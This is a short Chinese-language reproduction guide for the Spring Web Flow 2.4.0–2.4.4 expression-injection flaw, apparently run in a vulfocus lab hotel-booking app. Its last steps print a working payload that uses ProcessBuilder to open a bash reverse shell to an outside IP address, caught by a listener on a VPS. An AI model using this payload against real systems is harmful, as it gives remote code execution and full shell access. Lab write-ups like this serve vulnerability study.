一、漏洞概述
Spring Web Flow建立在Spring MVC之上,并允许实现Web应用程序的“流”,由于没有明确指定相关 model 的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行的漏洞。
二、影响范围
Spring Web Flow 2.4.0 – 2.4.4
三、漏洞复现
1、访问首页并登录。
2、根据给定的账号进行登录
3、点击Find Hotels
4、点击View Hotel
5、点击Book Hotel
6、随便填写信息后,点击Proceed
7、打开burp,点击Confirm
8、获取到提交的数据包,发到重放器。
9、构造payload进行反弹连接
&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+%3e%26+%2fdev%2ftcp%2f91.208.73.108%2f7777+0%3e%261")).start()=vulfocus
10、在vps服务器监听